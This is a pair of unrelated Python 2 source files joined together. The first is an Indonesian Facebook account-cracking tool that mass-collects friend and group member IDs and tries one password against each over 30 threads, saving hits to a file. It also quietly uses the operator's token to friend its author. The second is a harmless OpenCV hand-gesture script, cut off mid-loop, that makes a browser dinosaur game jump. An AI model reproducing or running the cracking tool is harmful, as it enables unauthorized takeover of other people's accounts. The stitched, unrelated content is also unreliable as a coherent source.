br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '\x1b[1;97m[!] \x1b[1;91mExit'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.05)
logo = '\x03\x00\x00\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x97\n\x1b[1;97m\xe2\x95\x91 \x1b[1;96m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x97\xe2\x94\xac \xe2\x94\xac\xe2\x94\x8c\xe2\x94\xac\xe2\x94\x90\xe2\x94\x8c\xe2\x94\x80\xe2\x94\x90 \xe2\x95\x94\xe2\x95\xa6\xe2\x95\x97\xe2\x95\x94\xe2\x95\x97 \xe2\x95\x94\xe2\x95\x90\xe2\x95\x97 \x1b[1;97m \xe2\x95\x91\n\x1b[1;97m\xe2\x95\x91 \x1b[1;96m\xe2\x95\xa0\xe2\x95\x90\xe2\x95\xa3\xe2\x94\x82 \xe2\x94\x82 \xe2\x94\x82 \xe2\x94\x82 \xe2\x94\x82 \xe2\x95\x91\xe2\x95\x91\xe2\x95\x91\xe2\x95\xa0\xe2\x95\xa9\xe2\x95\x97\xe2\x95\xa0\xe2\x95\xa3 \x1b[1;91m<(\xe2\x96\xba_\xe2\x97\x84)> \x1b[1;97m \xe2\x95\x91\n\x1b[1;97m\xe2\x95\x91 \x1b[1;96m\xe2\x95\xa9 \xe2\x95\xa9\xe2\x94\x94\xe2\x94\x80\xe2\x94\x98 \xe2\x94\xb4 \xe2\x94\x94\xe2\x94\x80\xe2\x94\x98 \xe2\x95\xa9 \xe2\x95\xa9\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a \x1b[1;97m \xe2\x95\x91\n\x1b[1;97m\xe2\x95\x91 Author \x1b[1;91m: \x1b[1;92mMr-XsZ \x1b[1;97m \xe2\x95\x91\n\x1b[1;97m\xe2\x95\x91 FB \x1b[1;91m: \x1b[1;93mhttps://fb.me/angga.pro.980967 \x1b[1;97m\xe2\x95\x91\n\x1b[1;97m\xe2\x95\x91 Github \x1b[1;91m: \x1b[1;92mhttps://github.com/Mr-XsZ \x1b[1;97m\xe2\x95\x91\n\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\x00\x00'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;97m[\xe2\x97\x8f] \x1b[1;92mSedang masuk \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
back = 0
cp = []
ok = []
id = []
def login():
os.system('clear')
try:
token = open('login.txt', 'r')
MBF()
except (KeyError, IOError):
os.system('clear')
print logo
print '\x1b[1;97m[\xe2\x98\x86] \x1b[1;92mLOGIN AKUN FACEBOOK ANDA \x1b[1;97m[\xe2\x98\x86]'
id = raw_input('\x1b[1;97m[+] \x1b[1;92mID/Email \x1b[1;91m: \x1b[1;97m')
pwd = raw_input('\x1b[1;97m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;97m[!] \x1b[1;91mTidak ada koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
unikers = open('login.txt', 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] \x1b[1;92mLogin Berhasil'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=angga.pro.980967&access_token=' + z['access_token'])
MBF()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;97m[!] \x1b[1;91mTidak ada koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;97m[!] \x1b[1;93mCekpoin'
os.system('rm -rf login')
time.sleep(1)
keluar()
else:
print '\n\x1b[1;97m[!] \x1b[1;91mPassword/Email salah'
os.system('rm -rf login.txt')
time.sleep(1)
login()
def MBF():
global token
os.system('clear')
try:
token = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;97m[!] \x1b[1;91mToken invalid'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + token)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print '\x1b[1;97m[!] \x1b[1;91mToken invalid'
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print '\x1b[1;97m[!] \x1b[1;91mTidak ada koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;97m\xe2\x95\x91[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m]\x1b[1;97m Wellcome \x1b[1;92m', nama, ' \x1b[1;97m'
print '\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x97'
print '\x1b[1;97m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d'
print '\x1b[1;97m\xe2\x95\x91 1. Crack dari daftar teman '
print '\x1b[1;97m\xe2\x95\x91 2. Crack dari teman '
print '\x1b[1;97m\xe2\x95\x91 3. Crack dari grup '
print '\x1b[1;97m\xe2\x95\x91 4. Crack dari file '
print '\x1b[1;97m\xe2\x95\x91\x1b[1;91m 0. Logout \x1b[1;97m'
print '\x1b[1;97m\xe2\x95\x91 '
pilihMBF()
def pilihMBF():
global cp
global ok
p = raw_input('\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90>> \x1b[1;97m')
if p == '':
print '\x1b[1;96m[!] \x1b[1;91mIsi yang benar'
time.sleep(1)
MBF()
else:
if p == '1':
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
jalan('\x1b[1;97m\xe2\x95\x91[\xe2\x9c\xba] \x1b[1;92mMengambil ID \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + token)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif p == '2':
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
idt = raw_input('\x1b[1;97m\xe2\x95\x91[+] \x1b[1;92mMasukan ID teman \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + token)
op = json.loads(jok.text)
print '\x1b[1;97m\xe2\x95\x91[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] \x1b[1;92mNama teman\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;97m\xe2\x95\x91[!] \x1b[1;91mTeman tidak ditemukan!'
print '\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
raw_input('\n\x1b[1;97m[\x1b[1;92mKembali\x1b[1;97m]')
MBF()
jalan('\x1b[1;97m\xe2\x95\x91[\xe2\x9c\xba] \x1b[1;92mMengambil ID \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + token)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif p == '3':
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
idg = raw_input('\x1b[1;97m\xe2\x95\x91[+] \x1b[1;92mMasukan ID group \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + token)
asw = json.loads(r.text)
print '\x1b[1;97m\xe2\x95\x91[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] \x1b[1;92mNama group \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;97m\xe2\x95\x91[!] \x1b[1;91mGroup tidak ditemukan'
print '\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
raw_input('\n\x1b[1;97m[\x1b[1;92mKembali\x1b[1;97m]')
MBF()
jalan('\x1b[1;97m\xe2\x95\x91[\xe2\x9c\xba] \x1b[1;92mMengambil ID \x1b[1;97m...')
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + token)
s = json.loads(re.text)
for p in s['data']:
id.append(p['id'])
elif p == '4':
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
try:
idlist = raw_input('\x1b[1;97m\xe2\x95\x91[+] \x1b[1;92mMasukan nama file \x1b[1;91m: \x1b[1;97m')
for line in open(idlist, 'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;97m\xe2\x95\x91[!] \x1b[1;91mFile tidak ditemukan'
print '\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
raw_input('\n\x1b[1;97m[\x1b[1;92mKembali\x1b[1;97m]')
MBF()
elif p == '0':
os.system('rm -rf login.txt')
keluar()
else:
print '\x1b[1;97m[!] \x1b[1;91mIsi yang benar'
MBF()
print '\x1b[1;97m\xe2\x95\x91[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
apa = raw_input('\x1b[1;97m\xe2\x95\x91[?] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
if apa == '':
print '\x1b[1;97m\xe2\x95\x91[!] \x1b[1;91mIsi yang benar'
print '\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
keluar()
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;97m\xe2\x95\x91[\x1b[1;92m\xe2\x9c\xb8\x1b[1;97m] \x1b[1;92mStart \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
print
print '\x1b[1;97m\xe2\x95\x91[!] \x1b[1;92mCrack dengan sandi \x1b[1;97m' + apa
print '\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
def main(arg):
user = arg
try:
os.mkdir('out')
except OSError:
pass
else:
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + token)
b = json.loads(a.text)
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + apa + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' \x1b[1;97m==> ' + apa
ok.append(user + apa)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP+\x1b[1;97m] ' + user + ' \x1b[1;97m==> ' + apa
cek = open('out/super_cp.txt', 'a')
cek.write('ID:' + user + ' Pw:' + apa + '\n')
cek.close()
cp.append(user + apa)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\x1b[1;97m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;97m\xe2\x95\x91[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] \x1b[1;92mSelesai \x1b[1;97m....'
print '\x1b[1;97m\xe2\x95\x91[+] \x1b[1;92mTotal OK/\x1b[1;93mCP \x1b[1;91m: \x1b[1;92m' + str(len(ok)) + '\x1b[1;97m/\x1b[1;93m' + str(len(cp))
print '\x1b[1;97m\xe2\x95\x91[+] \x1b[1;92mCP File tersimpan \x1b[1;91m: \x1b[1;97mout/super_cp.txt'
print '\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
raw_input('\n\x1b[1;97m[\x1b[1;92mKembali\x1b[1;97m]')
MBF()
|
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 23 01:01:43 2017
@author: abhisheksingh
"""
#%%
import cv2
import numpy as np
import os
import time
import gestureCNN as myNN
minValue = 70
x0 = 400
y0 = 200
height = 200
width = 200
saveImg = False
guessGesture = False
visualize = False
lastgesture = -1
kernel = np.ones((15,15),np.uint8)
kernel2 = np.ones((1,1),np.uint8)
skinkernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(5,5))
# Which mask mode to use BinaryMask or SkinMask (True|False)
binaryMode = False
counter = 0
# This parameter controls number of image samples to be taken PER gesture
numOfSamples = 301
gestname = ""
path = ""
mod = 0
banner = '''\nWhat would you like to do ?
1- Use pretrained model for gesture recognition & layer visualization
2- Train the model (you will require image samples for training under .\imgfolder)
3- Visualize feature maps of different layers of trained model
'''
#%%
def saveROIImg(img):
global counter, gestname, path, saveImg
if counter > (numOfSamples - 1):
# Reset the parameters
saveImg = False
gestname = ''
counter = 0
return
counter = counter + 1
name = gestname + str(counter)
print("Saving img:",name)
cv2.imwrite(path+name + ".png", img)
time.sleep(0.04 )
#%%
def skinMask(frame, x0, y0, width, height ):
global guessGesture, visualize, mod, lastgesture, saveImg
# HSV values
low_range = np.array([0, 50, 80])
upper_range = np.array([30, 200, 255])
cv2.rectangle(frame, (x0,y0),(x0+width,y0+height),(0,255,0),1)
roi = frame[y0:y0+height, x0:x0+width]
hsv = cv2.cvtColor(roi, cv2.COLOR_BGR2HSV)
#Apply skin color range
mask = cv2.inRange(hsv, low_range, upper_range)
mask = cv2.erode(mask, skinkernel, iterations = 1)
mask = cv2.dilate(mask, skinkernel, iterations = 1)
#blur
mask = cv2.GaussianBlur(mask, (15,15), 1)
#cv2.imshow("Blur", mask)
#bitwise and mask original frame
res = cv2.bitwise_and(roi, roi, mask = mask)
# color to grayscale
res = cv2.cvtColor(res, cv2.COLOR_BGR2GRAY)
if saveImg == True:
saveROIImg(res)
elif guessGesture == True:
retgesture = myNN.guessGesture(mod, res)
if lastgesture != retgesture :
lastgesture = retgesture
print myNN.output[lastgesture]
if lastgesture == 3:
import subprocess
subprocess.call(["xdotool", "type", ' '])
print myNN.output[lastgesture] + "= Dino JUMP!"
time.sleep(0.01 )
#guessGesture = False
elif visualize == True:
layer = int(raw_input("Enter which layer to visualize "))
cv2.waitKey(0)
myNN.visualizeLayers(mod, res, layer)
visualize = False
return res
#%%
def binaryMask(frame, x0, y0, width, height ):
global guessGesture, visualize, mod, lastgesture, saveImg
cv2.rectangle(frame, (x0,y0),(x0+width,y0+height),(0,255,0),1)
roi = frame[y0:y0+height, x0:x0+width]
gray = cv2.cvtColor(roi, cv2.COLOR_BGR2GRAY)
blur = cv2.GaussianBlur(gray,(5,5),2)
#blur = cv2.bilateralFilter(roi,9,75,75)
th3 = cv2.adaptiveThreshold(blur,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,cv2.THRESH_BINARY_INV,11,2)
ret, res = cv2.threshold(th3, minValue, 255, cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)
#ret, res = cv2.threshold(blur, minValue, 255, cv2.THRESH_BINARY +cv2.THRESH_OTSU)
if saveImg == True:
saveROIImg(res)
elif guessGesture == True:
retgesture = myNN.guessGesture(mod, res)
if lastgesture != retgesture :
lastgesture = retgesture
#print lastgesture
## Checking for only PUNCH gesture here
## Run this app in Prediction Mode and keep Chrome browser on focus with Internet Off
## And have fun :) with Dino
if lastgesture == 3:
import subprocess
subprocess.call(["xdotool", "type", ' '])
#jump = ''' osascript -e 'tell application "System Events" to key code 49' '''
#jump = ''' osascript -e 'tell application "System Events" to key down (49)' '''
#os.system(jump)
print myNN.output[lastgesture] + "= Dino JUMP!"
#time.sleep(0.01 )
#guessGesture = False
elif visualize == True:
layer = int(raw_input("Enter which layer to visualize "))
cv2.waitKey(1)
myNN.visualizeLayers(mod, res, layer)
visualize = False
return res
#%%
def Main():
global guessGesture, visualize, mod, binaryMode, x0, y0, width, height, saveImg, gestname, path
quietMode = False
font = cv2.FONT_HERSHEY_SIMPLEX
size = 0.5
fx = 10
fy = 355
fh = 18
#Call CNN model loading callback
while True:
ans = int(raw_input( banner))
if ans == 2:
mod = myNN.loadCNN(-1)
myNN.trainModel(mod)
raw_input("Press any key to continue")
break
elif ans == 1:
print "Will load default weight file"
mod = myNN.loadCNN(0)
break
elif ans == 3:
if not mod:
w = int(raw_input("Which weight file to load (0 or 1)"))
mod = myNN.loadCNN(w)
else:
print "Will load default weight file"
img = int(raw_input("Image number "))
layer = int(raw_input("Enter which layer to visualize "))
myNN.visualizeLayers(mod, img, layer)
raw_input("Press any key to continue")
continue
else:
print "Get out of here!!!"
return 0
## Grab camera input
cap = cv2.VideoCapture(0)
cv2.namedWindow('Original', cv2.WINDOW_NORMAL)
# set rt size as 640x480
ret = cap.set(3,640)
ret = cap.set(4,480)
while(True):
ret, frame = cap.read()
max_area = 0
frame = cv2.flip(frame, 3)
if ret == True:
